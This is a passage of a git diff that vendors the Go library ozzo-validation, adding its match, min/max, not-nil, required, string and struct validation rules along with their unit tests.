tests { + r := RuneLength(test.min, test.max) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_lengthRule_Error(t *testing.T) { + r := Length(10, 20) + assert.Equal(t, "the length must be between 10 and 20", r.message) + + r = Length(0, 20) + assert.Equal(t, "the length must be no more than 20", r.message) + + r = Length(10, 0) + assert.Equal(t, "the length must be no less than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match.go b/vendor/github.com/go-ozzo/ozzo-validation/match.go new file mode 100644 index 0000000000..02aa4fb62c --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/match.go @@ -0,0 +1,47 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "regexp" +) + +// Match returns a validation rule that checks if a value matches the specified regular expression. +// This rule should only be used for validating strings and byte slices, or a validation error will be reported. +// An empty value is considered valid. Use the Required rule to make sure a value is not empty. +func Match(re *regexp.Regexp) *matchRule { + return &matchRule{ + re: re, + message: "must be in a valid format", + } +} + +type matchRule struct { + re *regexp.Regexp + message string +} + +// Validate checks if the given value is valid or not. +func (v *matchRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil { + return nil + } + + isString, str, isBytes, bs := StringOrBytes(value) + if isString && (str == "" || v.re.MatchString(str)) { + return nil + } else if isBytes && (len(bs) == 0 || v.re.Match(bs)) { + return nil + } + return errors.New(v.message) +} + +// Error sets the error message for the rule. +func (v *matchRule) Error(message string) *matchRule { + v.message = message + return v +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/match_test.go b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go new file mode 100644 index 0000000000..98075e658a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/match_test.go @@ -0,0 +1,44 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "regexp" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestMatch(t *testing.T) { + var v2 *string + tests := []struct { + tag string + re string + value interface{} + err string + }{ + {"t1", "[a-z]+", "abc", ""}, + {"t2", "[a-z]+", "", ""}, + {"t3", "[a-z]+", v2, ""}, + {"t4", "[a-z]+", "123", "must be in a valid format"}, + {"t5", "[a-z]+", []byte("abc"), ""}, + {"t6", "[a-z]+", []byte("123"), "must be in a valid format"}, + {"t7", "[a-z]+", []byte(""), ""}, + {"t8", "[a-z]+", nil, ""}, + } + + for _, test := range tests { + r := Match(regexp.MustCompile(test.re)) + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_matchRule_Error(t *testing.T) { + r := Match(regexp.MustCompile("[a-z]+")) + assert.Equal(t, "must be in a valid format", r.message) + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go new file mode 100644 index 0000000000..952bd1c4fc --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax.go @@ -0,0 +1,177 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "fmt" + "reflect" + "time" +) + +type thresholdRule struct { + threshold interface{} + operator int + message string +} + +const ( + greaterThan = iota + greaterEqualThan + lessThan + lessEqualThan +) + +// Min is a validation rule that checks if a value is greater or equal than the specified value. +// By calling Exclusive, the rule will check if the value is strictly greater than the specified value. +// Note that the value being checked and the threshold value must be of the same type. +// Only int, uint, float and time.Time types are supported. +// An empty value is considered valid. Please use the Required rule to make sure a value is not empty. +func Min(min interface{}) *thresholdRule { + return &thresholdRule{ + threshold: min, + operator: greaterEqualThan, + message: fmt.Sprintf("must be no less than %v", min), + } +} + +// Max is a validation rule that checks if a value is less or equal than the specified value. +// By calling Exclusive, the rule will check if the value is strictly less than the specified value. +// Note that the value being checked and the threshold value must be of the same type. +// Only int, uint, float and time.Time types are supported. +// An empty value is considered valid. Please use the Required rule to make sure a value is not empty. +func Max(max interface{}) *thresholdRule { + return &thresholdRule{ + threshold: max, + operator: lessEqualThan, + message: fmt.Sprintf("must be no greater than %v", max), + } +} + +// Exclusive sets the comparison to exclude the boundary value. +func (r *thresholdRule) Exclusive() *thresholdRule { + if r.operator == greaterEqualThan { + r.operator = greaterThan + r.message = fmt.Sprintf("must be greater than %v", r.threshold) + } else if r.operator == lessEqualThan { + r.operator = lessThan + r.message = fmt.Sprintf("must be less than %v", r.threshold) + } + return r +} + +// Validate checks if the given value is valid or not. +func (r *thresholdRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + rv := reflect.ValueOf(r.threshold) + switch rv.Kind() { + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + v, err := ToInt(value) + if err != nil { + return err + } + if r.compareInt(rv.Int(), v) { + return nil + } + + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + v, err := ToUint(value) + if err != nil { + return err + } + if r.compareUint(rv.Uint(), v) { + return nil + } + + case reflect.Float32, reflect.Float64: + v, err := ToFloat(value) + if err != nil { + return err + } + if r.compareFloat(rv.Float(), v) { + return nil + } + + case reflect.Struct: + t, ok := r.threshold.(time.Time) + if !ok { + return fmt.Errorf("type not supported: %v", rv.Type()) + } + v, ok := value.(time.Time) + if !ok { + return fmt.Errorf("cannot convert %v to time.Time", reflect.TypeOf(value)) + } + if v.IsZero() || r.compareTime(t, v) { + return nil + } + + default: + return fmt.Errorf("type not supported: %v", rv.Type()) + } + + return errors.New(r.message) +} + +// Error sets the error message for the rule. +func (r *thresholdRule) Error(message string) *thresholdRule { + r.message = message + return r +} + +func (r *thresholdRule) compareInt(threshold, value int64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareUint(threshold, value uint64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareFloat(threshold, value float64) bool { + switch r.operator { + case greaterThan: + return value > threshold + case greaterEqualThan: + return value >= threshold + case lessThan: + return value < threshold + default: + return value <= threshold + } +} + +func (r *thresholdRule) compareTime(threshold, value time.Time) bool { + switch r.operator { + case greaterThan: + return value.After(threshold) + case greaterEqualThan: + return value.After(threshold) || value.Equal(threshold) + case lessThan: + return value.Before(threshold) + default: + return value.Before(threshold) || value.Equal(threshold) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go new file mode 100644 index 0000000000..562757f5d8 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go @@ -0,0 +1,137 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" + "time" +) + +func TestMin(t *testing.T) { + date0 := time.Time{} + date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC) + date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC) + date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC) + + tests := []struct { + tag string + threshold interface{} + exclusive bool + value interface{} + err string + }{ + // int cases + {"t1.1", 1, false, 1, ""}, + {"t1.2", 1, false, 2, ""}, + {"t1.3", 1, false, -1, "must be no less than 1"}, + {"t1.4", 1, false, 0, ""}, + {"t1.5", 1, true, 1, "must be greater than 1"}, + {"t1.6", 1, false, "1", "cannot convert string to int64"}, + {"t1.7", "1", false, 1, "type not supported: string"}, + // uint cases + {"t2.1", uint(2), false, uint(2), ""}, + {"t2.2", uint(2), false, uint(3), ""}, + {"t2.3", uint(2), false, uint(1), "must be no less than 2"}, + {"t2.4", uint(2), false, uint(0), ""}, + {"t2.5", uint(2), true, uint(2), "must be greater than 2"}, + {"t2.6", uint(2), false, "1", "cannot convert string to uint64"}, + // float cases + {"t3.1", float64(2), false, float64(2), ""}, + {"t3.2", float64(2), false, float64(3), ""}, + {"t3.3", float64(2), false, float64(1), "must be no less than 2"}, + {"t3.4", float64(2), false, float64(0), ""}, + {"t3.5", float64(2), true, float64(2), "must be greater than 2"}, + {"t3.6", float64(2), false, "1", "cannot convert string to float64"}, + // Time cases + {"t4.1", date20000601, false, date20000601, ""}, + {"t4.2", date20000601, false, date20001201, ""}, + {"t4.3", date20000601, false, date20000101, "must be no less than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.4", date20000601, false, date0, ""}, + {"t4.5", date20000601, true, date20000601, "must be greater than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.6", date20000601, true, 1, "cannot convert int to time.Time"}, + {"t4.7", struct{}{}, false, 1, "type not supported: struct {}"}, + } + + for _, test := range tests { + r := Min(test.threshold) + if test.exclusive { + r.Exclusive() + } + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestMinError(t *testing.T) { + r := Min(10) + assert.Equal(t, "must be no less than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} + +func TestMax(t *testing.T) { + date0 := time.Time{} + date20000101 := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC) + date20001201 := time.Date(2000, 12, 1, 0, 0, 0, 0, time.UTC) + date20000601 := time.Date(2000, 6, 1, 0, 0, 0, 0, time.UTC) + + tests := []struct { + tag string + threshold interface{} + exclusive bool + value interface{} + err string + }{ + // int cases + {"t1.1", 2, false, 2, ""}, + {"t1.2", 2, false, 1, ""}, + {"t1.3", 2, false, 3, "must be no greater than 2"}, + {"t1.4", 2, false, 0, ""}, + {"t1.5", 2, true, 2, "must be less than 2"}, + {"t1.6", 2, false, "1", "cannot convert string to int64"}, + {"t1.7", "1", false, 1, "type not supported: string"}, + // uint cases + {"t2.1", uint(2), false, uint(2), ""}, + {"t2.2", uint(2), false, uint(1), ""}, + {"t2.3", uint(2), false, uint(3), "must be no greater than 2"}, + {"t2.4", uint(2), false, uint(0), ""}, + {"t2.5", uint(2), true, uint(2), "must be less than 2"}, + {"t2.6", uint(2), false, "1", "cannot convert string to uint64"}, + // float cases + {"t3.1", float64(2), false, float64(2), ""}, + {"t3.2", float64(2), false, float64(1), ""}, + {"t3.3", float64(2), false, float64(3), "must be no greater than 2"}, + {"t3.4", float64(2), false, float64(0), ""}, + {"t3.5", float64(2), true, float64(2), "must be less than 2"}, + {"t3.6", float64(2), false, "1", "cannot convert string to float64"}, + // Time cases + {"t4.1", date20000601, false, date20000601, ""}, + {"t4.2", date20000601, false, date20000101, ""}, + {"t4.3", date20000601, false, date20001201, "must be no greater than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.4", date20000601, false, date0, ""}, + {"t4.5", date20000601, true, date20000601, "must be less than 2000-06-01 00:00:00 +0000 UTC"}, + {"t4.6", date20000601, true, 1, "cannot convert int to time.Time"}, + } + + for _, test := range tests { + r := Max(test.threshold) + if test.exclusive { + r.Exclusive() + } + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestMaxError(t *testing.T) { + r := Max(10) + assert.Equal(t, "must be no greater than 10", r.message) + + r.Error("123") + assert.Equal(t, "123", r.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go new file mode 100644 index 0000000000..6cfca1204a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil.go @@ -0,0 +1,32 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// NotNil is a validation rule that checks if a value is not nil. +// NotNil only handles types including interface, pointer, slice, and map. +// All other types are considered valid. +var NotNil = ¬NilRule{message: "is required"} + +type notNilRule struct { + message string +} + +// Validate checks if the given value is valid or not. +func (r *notNilRule) Validate(value interface{}) error { + _, isNil := Indirect(value) + if isNil { + return errors.New(r.message) + } + return nil +} + +// Error sets the error message for the rule. +func (r *notNilRule) Error(message string) *notNilRule { + return ¬NilRule{ + message: message, + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go new file mode 100644 index 0000000000..4821da531c --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go @@ -0,0 +1,50 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +type MyInterface interface { + Hello() +} + +func TestNotNil(t *testing.T) { + var v1 []int + var v2 map[string]int + var v3 *int + var v4 interface{} + var v5 MyInterface + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", v1, "is required"}, + {"t2", v2, "is required"}, + {"t3", v3, "is required"}, + {"t4", v4, "is required"}, + {"t5", v5, "is required"}, + {"t6", "", ""}, + {"t7", 0, ""}, + } + + for _, test := range tests { + r := NotNil + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_notNilRule_Error(t *testing.T) { + r := NotNil + assert.Equal(t, "is required", r.message) + r2 := r.Error("123") + assert.Equal(t, "is required", r.message) + assert.Equal(t, "123", r2.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required.go b/vendor/github.com/go-ozzo/ozzo-validation/required.go new file mode 100644 index 0000000000..ef9558e025 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/required.go @@ -0,0 +1,42 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +// Required is a validation rule that checks if a value is not empty. +// A value is considered not empty if +// - integer, float: not zero +// - bool: true +// - string, array, slice, map: len() > 0 +// - interface, pointer: not nil and the referenced value is not empty +// - any other types +var Required = &requiredRule{message: "cannot be blank", skipNil: false} + +// NilOrNotEmpty checks if a value is a nil pointer or a value that is not empty. +// NilOrNotEmpty differs from Required in that it treats a nil pointer as valid. +var NilOrNotEmpty = &requiredRule{message: "cannot be blank", skipNil: true} + +type requiredRule struct { + message string + skipNil bool +} + +// Validate checks if the given value is valid or not. +func (v *requiredRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if v.skipNil && !isNil && IsEmpty(value) || !v.skipNil && (isNil || IsEmpty(value)) { + return errors.New(v.message) + } + return nil +} + +// Error sets the error message for the rule. +func (v *requiredRule) Error(message string) *requiredRule { + return &requiredRule{ + message: message, + skipNil: v.skipNil, + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/required_test.go b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go new file mode 100644 index 0000000000..c85e412149 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/required_test.go @@ -0,0 +1,75 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestRequired(t *testing.T) { + s1 := "123" + s2 := "" + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", "", "cannot be blank"}, + {"t3", &s1, ""}, + {"t4", &s2, "cannot be blank"}, + {"t5", nil, "cannot be blank"}, + } + + for _, test := range tests { + r := Required + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func TestNilOrNotEmpty(t *testing.T) { + s1 := "123" + s2 := "" + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", "", "cannot be blank"}, + {"t3", &s1, ""}, + {"t4", &s2, "cannot be blank"}, + {"t5", nil, ""}, + } + + for _, test := range tests { + r := NilOrNotEmpty + err := r.Validate(test.value) + assertError(t, test.err, err, test.tag) + } +} + +func Test_requiredRule_Error(t *testing.T) { + r := Required + assert.Equal(t, "cannot be blank", r.message) + assert.False(t, r.skipNil) + r2 := r.Error("123") + assert.Equal(t, "cannot be blank", r.message) + assert.False(t, r.skipNil) + assert.Equal(t, "123", r2.message) + assert.False(t, r2.skipNil) + + r = NilOrNotEmpty + assert.Equal(t, "cannot be blank", r.message) + assert.True(t, r.skipNil) + r2 = r.Error("123") + assert.Equal(t, "cannot be blank", r.message) + assert.True(t, r.skipNil) + assert.Equal(t, "123", r2.message) + assert.True(t, r2.skipNil) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string.go b/vendor/github.com/go-ozzo/ozzo-validation/string.go new file mode 100644 index 0000000000..e8f2a5e749 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/string.go @@ -0,0 +1,48 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import "errors" + +type stringValidator func(string) bool + +// StringRule is a rule that checks a string variable using a specified stringValidator. +type StringRule struct { + validate stringValidator + message string +} + +// NewStringRule creates a new validation rule using a function that takes a string value and returns a bool. +// The rule returned will use the function to check if a given string or byte slice is valid or not. +// An empty value is considered to be valid. Please use the Required rule to make sure a value is not empty. +func NewStringRule(validator stringValidator, message string) *StringRule { + return &StringRule{ + validate: validator, + message: message, + } +} + +// Error sets the error message for the rule. +func (v *StringRule) Error(message string) *StringRule { + return NewStringRule(v.validate, message) +} + +// Validate checks if the given value is valid or not. +func (v *StringRule) Validate(value interface{}) error { + value, isNil := Indirect(value) + if isNil || IsEmpty(value) { + return nil + } + + str, err := EnsureString(value) + if err != nil { + return err + } + + if v.validate(str) { + return nil + } + return errors.New(v.message) +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/string_test.go b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go new file mode 100644 index 0000000000..80da2286d9 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/string_test.go @@ -0,0 +1,106 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "database/sql" + "testing" + + "reflect" + + "github.com/stretchr/testify/assert" +) + +func validateMe(s string) bool { + return s == "me" +} + +func TestNewStringRule(t *testing.T) { + v := NewStringRule(validateMe, "abc") + assert.NotNil(t, v.validate) + assert.Equal(t, "abc", v.message) +} + +func TestStringValidator_Error(t *testing.T) { + v := NewStringRule(validateMe, "abc") + assert.Equal(t, "abc", v.message) + v2 := v.Error("correct") + assert.Equal(t, "correct", v2.message) + assert.Equal(t, "abc", v.message) +} + +func TestStringValidator_Validate(t *testing.T) { + v := NewStringRule(validateMe, "wrong") + + value := "me" + + err := v.Validate(value) + assert.Nil(t, err) + + err = v.Validate(&value) + assert.Nil(t, err) + + value = "" + + err = v.Validate(value) + assert.Nil(t, err) + + err = v.Validate(&value) + assert.Nil(t, err) + + nullValue := sql.NullString{String: "me", Valid: true} + err = v.Validate(nullValue) + assert.Nil(t, err) + + nullValue = sql.NullString{String: "", Valid: true} + err = v.Validate(nullValue) + assert.Nil(t, err) + + var s *string + err = v.Validate(s) + assert.Nil(t, err) + + err = v.Validate("not me") + if assert.NotNil(t, err) { + assert.Equal(t, "wrong", err.Error()) + } + + err = v.Validate(100) + if assert.NotNil(t, err) { + assert.NotEqual(t, "wrong", err.Error()) + } + + v2 := v.Error("Wrong!") + err = v2.Validate("not me") + if assert.NotNil(t, err) { + assert.Equal(t, "Wrong!", err.Error()) + } +} + +func TestGetErrorFieldName(t *testing.T) { + type A struct { + T0 string + T1 string `json:"t1"` + T2 string `json:"t2,omitempty"` + T3 string `json:",omitempty"` + T4 string `json:"t4,x1,omitempty"` + } + tests := []struct { + tag string + field string + name string + }{ + {"t1", "T0", "T0"}, + {"t2", "T1", "t1"}, + {"t3", "T2", "t2"}, + {"t4", "T3", "T3"}, + {"t5", "T4", "t4"}, + } + a := reflect.TypeOf(A{}) + for _, test := range tests { + field, _ := a.FieldByName(test.field) + assert.Equal(t, test.name, getErrorFieldName(&field), test.tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct.go b/vendor/github.com/go-ozzo/ozzo-validation/struct.go new file mode 100644 index 0000000000..2d3a19c34a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/struct.go @@ -0,0 +1,154 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "fmt" + "reflect" + "strings" +) + +var ( + // StructPointerError is the error that a struct being validated is not specified as a pointer. + StructPointerError = errors.New("only a pointer to a struct can be validated") +) + +type ( + // FieldPointerError is the error that a field is not specified as a pointer. + FieldPointerError int + + // FieldNotFoundError is the error that a field cannot be found in the struct. + FieldNotFoundError int + + // FieldRules represents a rule set associated with a struct field. + FieldRules struct { + fieldPtr interface{} + rules []Rule + } +) + +// Error returns the error string of FieldPointerError. +func (e FieldPointerError) Error() string { + return fmt.Sprintf("field #%v must be specified as a pointer", int(e)) +} + +// Error returns the error string of FieldNotFoundError. +func (e FieldNotFoundError) Error() string { + return fmt.Sprintf("field #%v cannot be found in the struct", int(e)) +} + +// ValidateStruct validates a struct by checking the specified struct fields against the corresponding validation rules. +// Note that the struct being validated must be specified as a pointer to it. If the pointer is nil, it is considered valid. +// Use Field() to specify struct fields that need to be validated. Each Field() call specifies a single field which +// should be specified as a pointer to the field. A field can be associated with multiple rules. +// For example, +// +// value := struct { +// Name string +// Value string +// }{"name", "demo"} +// err := validation.ValidateStruct(&value, +// validation.Field(&a.Name, validation.Required), +// validation.Field(&a.Value, validation.Required, validation.Length(5, 10)), +// ) +// fmt.Println(err) +// // Value: the length must be between 5 and 10. +// +// An error will be returned if validation fails. +func ValidateStruct(structPtr interface{}, fields ...*FieldRules) error { + value := reflect.ValueOf(structPtr) + if value.Kind() != reflect.Ptr || !value.IsNil() && value.Elem().Kind() != reflect.Struct { + // must be a pointer to a struct + return NewInternalError(StructPointerError) + } + if value.IsNil() { + // treat a nil struct pointer as valid + return nil + } + value = value.Elem() + + errs := Errors{} + + for i, fr := range fields { + fv := reflect.ValueOf(fr.fieldPtr) + if fv.Kind() != reflect.Ptr { + return NewInternalError(FieldPointerError(i)) + } + ft := findStructField(value, fv) + if ft == nil { + return NewInternalError(FieldNotFoundError(i)) + } + if err := Validate(fv.Elem().Interface(), fr.rules...); err != nil { + if ie, ok := err.(InternalError); ok && ie.InternalError() != nil{ + return err + } + if ft.Anonymous { + // merge errors from anonymous struct field + if es, ok := err.(Errors); ok { + for name, value := range es { + errs[name] = value + } + continue + } + } + errs[getErrorFieldName(ft)] = err + } + } + + if len(errs) > 0 { + return errs + } + return nil +} + +// Field specifies a struct field and the corresponding validation rules. +// The struct field must be specified as a pointer to it. +func Field(fieldPtr interface{}, rules ...Rule) *FieldRules { + return &FieldRules{ + fieldPtr: fieldPtr, + rules: rules, + } +} + +// findStructField looks for a field in the given struct. +// The field being looked for should be a pointer to the actual struct field. +// If found, the field info will be returned. Otherwise, nil will be returned. +func findStructField(structValue reflect.Value, fieldValue reflect.Value) *reflect.StructField { + ptr := fieldValue.Pointer() + for i := structValue.NumField() - 1; i >= 0; i-- { + sf := structValue.Type().Field(i) + if ptr == structValue.Field(i).UnsafeAddr() { + // do additional type comparison because it's possible that the address of + // an embedded struct is the same as the first field of the embedded struct + if sf.Type == fieldValue.Elem().Type() { + return &sf + } + } + if sf.Anonymous { + // delve into anonymous struct to look for the field + fi := structValue.Field(i) + if sf.Type.Kind() == reflect.Ptr { + fi = fi.Elem() + } + if fi.Kind() == reflect.Struct { + if f := findStructField(fi, fieldValue); f != nil { + return f + } + } + } + } + return nil +} + +// getErrorFieldName returns the name that should be used to represent the validation error of a struct field. +func getErrorFieldName(f *reflect.StructField) string { + if tag := f.Tag.Get(ErrorTag); tag != "" { + if cps := strings.SplitN(tag, ",", 2); cps[0] != "" { + return cps[0] + } + } + return f.Name +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go new file mode 100644 index 0000000000..97c7a4f1ac --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go @@ -0,0 +1,137 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "reflect" + "testing" + + "github.com/stretchr/testify/assert" +) + +type Struct1 struct { + Field1 int + Field2 *int + Field3 []int + Field4 [4]int + field5 int + Struct2 + S1 *Struct2 + S2 Struct2 +} + +type Struct2 struct { + Field21 string + Field22 string +} + +type Struct3 struct { + *Struct2 + S1 string +} + +func TestFindStructField(t *testing.T) { + var s1 Struct1 + v1 := reflect.ValueOf(&s1).Elem() + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field1))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field2))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field2))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field3))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field3))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field4))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.field5))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2))) + assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.S1))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.S1))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field21))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field22))) + assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2.Field22))) + s2 := reflect.ValueOf(&s1.Struct2).Elem() + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Field21))) + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field21))) + assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field22))) + s3 := Struct3{ + Struct2: &Struct2{}, + } + v3 := reflect.ValueOf(&s3).Elem() + assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Struct2))) + assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Field21))) +} + +func TestValidateStruct(t *testing.T) { + var m0 *Model1 + m1 := Model1{A: "abc", B: "xyz", c: "abc", G: "xyz"} + m2 := Model1{E: String123("xyz")} + m3 := Model2{} + m4 := Model2{M3: Model3{A: "abc"}, Model3: Model3{A: "abc"}} + m5 := Model2{Model3: Model3{A: "internal"}} + tests := []struct { + tag string + model interface{} + rules []*FieldRules + err string + }{ + // empty rules + {"t1.1", &m1, []*FieldRules{}, ""}, + {"t1.2", &m1, []*FieldRules{Field(&m1.A), Field(&m1.B)}, ""}, + // normal rules + {"t2.1", &m1, []*FieldRules{Field(&m1.A, &validateAbc{}), Field(&m1.B, &validateXyz{})}, ""}, + {"t2.2", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.B, &validateAbc{})}, "A: error xyz; B: error abc."}, + {"t2.3", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.c, &validateXyz{})}, "A: error xyz; c: error xyz."}, + {"t2.4", &m1, []*FieldRules{Field(&m1.D, Length(0, 5))}, ""}, + {"t2.5", &m1, []*FieldRules{Field(&m1.F, Length(0, 5))}, ""}, + // non-struct pointer + {"t3.1", m1, []*FieldRules{}, StructPointerError.Error()}, + {"t3.2", nil, []*FieldRules{}, StructPointerError.Error()}, + {"t3.3", m0, []*FieldRules{}, ""}, + {"t3.4", &m0, []*FieldRules{}, StructPointerError.Error()}, + // invalid field spec + {"t4.1", &m1, []*FieldRules{Field(m1)}, FieldPointerError(0).Error()}, + {"t4.2", &m1, []*FieldRules{Field(&m1)}, FieldNotFoundError(0).Error()}, + // struct tag + {"t5.1", &m1, []*FieldRules{Field(&m1.G, &validateAbc{})}, "g: error abc."}, + // validatable field + {"t6.1", &m2, []*FieldRules{Field(&m2.E)}, "E: error 123."}, + {"t6.2", &m2, []*FieldRules{Field(&m2.E, Skip)}, ""}, + // Required, NotNil + {"t7.1", &m2, []*FieldRules{Field(&m2.F, Required)}, "F: cannot be blank."}, + {"t7.2", &m2, []*FieldRules{Field(&m2.F, NotNil)}, "F: is required."}, + {"t7.3", &m2, []*FieldRules{Field(&m2.E, Required, Skip)}, ""}, + {"t7.4", &m2, []*FieldRules{Field(&m2.E, NotNil, Skip)}, ""}, + // embedded structs + {"t8.1", &m3, []*FieldRules{Field(&m3.M3, Skip)}, ""}, + {"t8.2", &m3, []*FieldRules{Field(&m3.M3)}, "M3: (A: error abc.)."}, + {"t8.3", &m3, []*FieldRules{Field(&m3.Model3, Skip)}, ""}, + {"t8.4", &m3, []*FieldRules{Field(&m3.Model3)}, "A: error abc."}, + {"t8.5", &m4, []*FieldRules{Field(&m4.M3)}, ""}, + {"t8.6", &m4, []*FieldRules{Field(&m4.Model3)}, ""}, + {"t8.7", &m3, []*FieldRules{Field(&m3.A, Required), Field(&m3.B, Required)}, "A: cannot be blank; B: cannot be blank."}, + {"t8.8", &m3, []*FieldRules{Field(&m4.A, Required)}, "field #0 cannot be found in the struct"}, + // internal error + {"t9.1", &m5, []*FieldRules{Field(&m5.A, &validateAbc{}), Field(&m5.B, Required), Field(&m5.A, 